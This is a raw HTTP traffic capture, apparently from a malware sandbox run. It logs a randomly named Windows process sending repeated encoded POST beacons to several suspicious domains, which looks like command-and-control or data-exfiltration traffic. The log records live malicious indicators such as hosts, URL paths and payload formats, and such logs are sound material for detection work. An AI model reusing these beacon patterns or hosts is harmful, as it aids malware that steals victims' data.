Dec 13, 2024 13:06:47.357765913 CET | 513 | OUT | GET /jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
Host: www.idsmart.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Dec 13, 2024 13:06:48.766279936 CET | 1236 | IN | HTTP/1.1 200 OK
date: Fri, 13 Dec 2024 12:06:48 GMT
server: Apache
set-cookie: __tad=1734091608.7578817; expires=Mon, 11-Dec-2034 12:06:48 GMT; Max-Age=315360000
vary: Accept-Encoding
content-length: 1512
content-type: text/html; charset=UTF-8
connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 69 64 73 6d 61 72 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 73 6d 61 72 74 2e 6f 6e 6c 69 6e 65 2f 6a 62 67 79 2f 3f 39 42 5f 70 70 74 3d 57 70 4d 2b 64 44 77 55 72 73 34 59 6b 62 35 62 31 64 6e 6a 62 4f 66 69 79 48 37 44 51 42 62 55 79 67 69 68 4e 6c 51 76 62 65 5a 73 69 66 4a 5a 6d 67 64 38 32 65 57 42 57 6c 71 59 6f 58 5a 34 4d 30 6e 46 44 55 4b 6c 63 38 64 6b 4e 51 55 76 2b 2b 4e 67 7a 4a 55 71 36 54 78 46 52 76 59 7a 36 55 37 4c 67 55 38 53 76 63 36 34 6c 43 30 44 37 42 67 78 4b 32 38 3d 26 53 62 76 38 49 3d [TRUNCATED]
                                                                        Data Ascii: <html><head><title>idsmart.online</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.idsmart.online/jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor
Dec 13, 2024 13:06:48.766361952 CET | 548 | IN | Data Raw: 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 64 73 6d 61 72 74
                                                                        Data Ascii: ="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.idsmart.online/jbgy/?9B_ppt=WpM+dDwUrs4Ykb5b1dnjbOfiyH7DQBbUygihNlQvbeZsifJZmgd82eWBWlqYoXZ4M0nFDUKlc8dkNQUv++NgzJUq6TxFRvYz6U7LgU8Svc64lC0D7BgxK28=&Sbv8I=RfPDYvIHtJXp8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.67.158.234 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:04.360903025 CET | 788 | OUT | POST /90oi/ HTTP/1.1
Host: www.sortcouponspot.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Origin: http://www.sortcouponspot.shop
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 203
Referer: http://www.sortcouponspot.shop/90oi/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=bfuRtwTtPSzFqHPhLpWleTdQOZjCW4BOIx9OcRscj5ac6iL3J2IXNQYQSKsirhT1B7WD2OZBx8rnIFJtmx18Wmn2uxvqoOLI0EZr6H6ZGbkadQDLzZqiVLxNf9JutCjOoP0rutH2WzMAcQWYsJy4XGitvzBWPNQTWdV4xznc3v00XTh2lMyK6Upq0P5YbSmk0w==
                                                                        Dec 13, 2024 13:07:05.529803991 CET | 1236 | IN | HTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:05 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mx4h9vjU5Sr1j1uckUPPiQUZL2cEZg%2FzP9MS%2BnL2TypysYjC10H2vaoaCoQjD15zH%2Bn1MS1mvb2frSK2sGVHnntV4FDTkTf51eBBWhNJQMB04KMhMMKAbdWwddx478aXFDFWFAwUivY5Gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d4f1faf64301-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d4f1faf64301',t:'MTczNDA5MTYyNS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scrip
                                                                        Dec 13, 2024 13:07:05.529853106 CET | 662 | IN
                                                                        Data Ascii: ts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        2 | 192.168.2.4 | 49738 | 172.67.158.234 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:07:07.034020901 CET | 808 | OUT | POST /90oi/ HTTP/1.1
                                                                        Host: www.sortcouponspot.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.sortcouponspot.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.sortcouponspot.shop/90oi/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=bfuRtwTtPSzFokXhIOKlWTdRLZjCDIBVIxhOcTAyjL+c9D73Kz8XOQYQK6sjoRSYB7aL2MNBx8/nIBNtnBJ/W2nwhRvswuLI0EZr6HfMGb8adjbLz8GjYrxOY9Ju6SjSoP0JuonQW2AAcRmYrde5eGjowjAKFvIDTYsm7yLo0sBTWVss09TdoUNZpIwsWRbtvy4TRpGfD9mMluwyL3+2/XA=
                                                                        Dec 13, 2024 13:07:08.252403975 CET | 1236 | IN | HTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:08 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFCN1DiW6CfBfm8g23dxAp7q3NC16K0ClwgiyYFQKesYaFFOvo7mYpvZs6U71YQ1mIdP2f2CLSQxYFcDbibvjdBxNcr09KKZfWXVlcgkeeE6ZGX%2B3lliK47Q37jalFYr%2Fe0nkqZFth%2BEFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d502e8f34259-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d502e8f34259',t:'MTczNDA5MTYyOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scrip
                                                                        Dec 13, 2024 13:07:08.252502918 CET | 662 | IN
                                                                        Data Ascii: ts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.4 | 49740 | 172.67.158.234 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:07:09.695612907 CET | 10890 | OUT | POST /90oi/ HTTP/1.1
                                                                        Host: www.sortcouponspot.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.sortcouponspot.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.sortcouponspot.shop/90oi/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt= [TRUNCATED]
                                                                        Dec 13, 2024 13:07:10.908570051 CET | 1236 | IN | HTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:10 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23gUTE9iJz7eJsNX1IZB0bt6N4lj%2BbTq8AfpN8agQx%2F32iQTdZcd2BjFSgDvSrZEH9R4uXC1ytxKDxkaIomkbC%2F8Qon0cQtOLThC3wOaHwOI%2BAu%2B%2FMB5f69hb37YHjjojtuPLjKcusaC3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d5135ea80f3e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10890&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d5135ea80f3e',t:'MTczNDA5MTYzMC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platf
                                                                        Dec 13, 2024 13:07:10.908677101 CET | 671 | IN
                                                                        Data Ascii: orm/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.st


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        4 | 192.168.2.4 | 49747 | 172.67.158.234 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:07:12.347208023 CET | 518 | OUT | GET /90oi/?9B_ppt=WdGxuHz/ABXbnxDuMcWeaiAtNv6zbYEnDSFRQwgnlI3l3VbPFG0OHzktVpkkqW+LG4OUxeltpIvdJ1ISlR18S3Wjl2Tf6Ort1F9q8CbBD/86Ywb40YjbYcY=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.sortcouponspot.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:07:13.579396009 CET | 1236 | IN | HTTP/1.1 429
                                                                        Date: Fri, 13 Dec 2024 12:07:13 GMT
                                                                        Content-Type: text/html;charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BraqSLccUd4v3Kk5mRQJiUhUECQSF47EWOF5ybAAbZwWUHyr58hJAZ%2B4hJ0%2FbEpQegU9B9wsl2HJ9slSOxq8p4fFOvVUMVxXBqI7nN0yuaEiAhWlnihGnloXwj6p7xURftJnkpTQXlz0eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d5241dec8ce0-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1823&rtt_var=911&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=518&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Ascii: 44b<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f15d5241dec8ce0',t:'MTczNDA5MTYzMy4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scrip
                                                                        Dec 13, 2024 13:07:13.579413891 CET | 662 | IN
                                                                        Data Ascii: ts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.4 | 49768 | 161.97.142.144 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:07:19.234565973 CET | 770 | OUT | POST /fc2m/ HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002128.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.030002128.xyz/fc2m/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=HYugaIXnf+P98DFpzW5OlGuQJePtAeKJdLry4F81Gbihbv6nTcGfuRwVsen2JtWIC/k+m2OtuAfSbZfAYmxFBsKR1yOEN2nSmSexBDLcRFbqiiyJ3cfo6VfGiD7gwPG4aHoPx9B0oYyHNOguq+NyZWOm1BrlCYXRGhMnAD0OM7YdtCJ0e8U9umVs2RTKbgvjZw==
                                                                        Dec 13, 2024 13:07:20.468278885 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:20 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Dec 13, 2024 13:07:20.468355894 CET | 370 | IN


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.4 | 49774 | 161.97.142.144 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:07:21.900254965 CET | 790 | OUT | POST /fc2m/ HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002128.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.030002128.xyz/fc2m/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 48 59 75 67 61 49 58 6e 66 2b 50 39 38 6a 31 70 77 31 68 4f 69 6d 75 54 46 2b 50 74 4c 2b 4b 4e 64 4c 6e 79 34 45 49 66 48 70 32 68 43 50 71 6e 53 59 79 66 74 52 77 56 6e 2b 6e 7a 55 64 57 58 43 2f 67 32 6d 33 79 74 75 41 4c 53 62 63 6a 41 59 78 64 47 54 4d 4b 54 36 53 4f 61 4a 32 6e 53 6d 53 65 78 42 43 75 35 52 46 54 71 6c 54 43 4a 78 39 66 72 37 56 66 46 7a 44 37 67 30 50 47 38 61 48 70 59 78 38 64 65 6f 61 4b 48 4e 4d 49 75 72 76 4e 31 58 6d 4f 67 78 42 72 32 4e 39 79 71 49 42 51 73 42 6c 67 65 4d 5a 45 67 6f 45 45 75 50 4e 31 71 38 6d 78 66 72 57 61 2b 57 6a 53 71 43 79 35 33 34 57 6a 65 6b 2b 6f 6c 48 4d 55 33 63 41 61 4b 58 74 45 3d
                                                                        Data Ascii: 9B_ppt=HYugaIXnf+P98j1pw1hOimuTF+PtL+KNdLny4EIfHp2hCPqnSYyftRwVn+nzUdWXC/g2m3ytuALSbcjAYxdGTMKT6SOaJ2nSmSexBCu5RFTqlTCJx9fr7VfFzD7g0PG8aHpYx8deoaKHNMIurvN1XmOgxBr2N9yqIBQsBlgeMZEgoEEuPN1q8mxfrWa+WjSqCy534Wjek+olHMU3cAaKXtE=
Dec 13, 2024 13:07:23.137814999 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:22 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Dec 13, 2024 13:07:23.137918949 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49780 | 161.97.142.144 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:24.659626007 CET | 10872 | OUT | POST /fc2m/ HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002128.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.030002128.xyz/fc2m/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 48 59 75 67 61 49 58 6e 66 2b 50 39 38 6a 31 70 77 31 68 4f 69 6d 75 54 46 2b 50 74 4c 2b 4b 4e 64 4c 6e 79 34 45 49 66 48 70 75 68 65 73 53 6e 64 5a 79 66 73 52 77 56 37 4f 6e 79 55 64 57 65 43 2f 59 79 6d 33 2b 39 75 43 7a 53 4a 71 33 41 4a 31 4a 47 4b 38 4b 54 2f 69 4f 48 4e 32 6e 48 6d 53 4f 31 42 44 65 35 52 46 54 71 6c 51 61 4a 32 73 66 72 35 56 66 47 69 44 36 68 77 50 47 59 61 48 77 74 78 38 59 72 72 71 71 48 4d 73 34 75 6d 39 6c 31 56 47 4f 69 39 68 71 72 4e 39 32 31 49 42 39 56 42 6c 38 30 4d 62 59 67 6b 46 68 4a 57 65 77 39 72 56 4a 39 7a 58 50 63 51 7a 47 31 50 53 64 57 38 53 53 48 32 64 30 77 4b 63 78 77 50 52 32 6f 56 59 36 70 6d 50 6a 35 56 7a 72 35 4f 6a 79 30 49 75 39 75 6c 4e 78 4c 58 47 2b 31 41 64 39 63 6f 6e 6d 37 35 35 64 53 72 35 5a 73 6d 37 33 73 74 64 75 50 2b 78 67 46 42 76 53 79 72 4a 38 36 6c 71 78 36 59 55 38 72 2f 4c 54 66 45 2f 2f 54 4a 69 64 36 47 74 66 54 6c 39 51 6f 68 42 36 61 4e 36 6c 42 53 76 52 43 78 74 59 46 30 77 36 6e 4d 53 37 53 53 4e 70 [TRUNCATED]
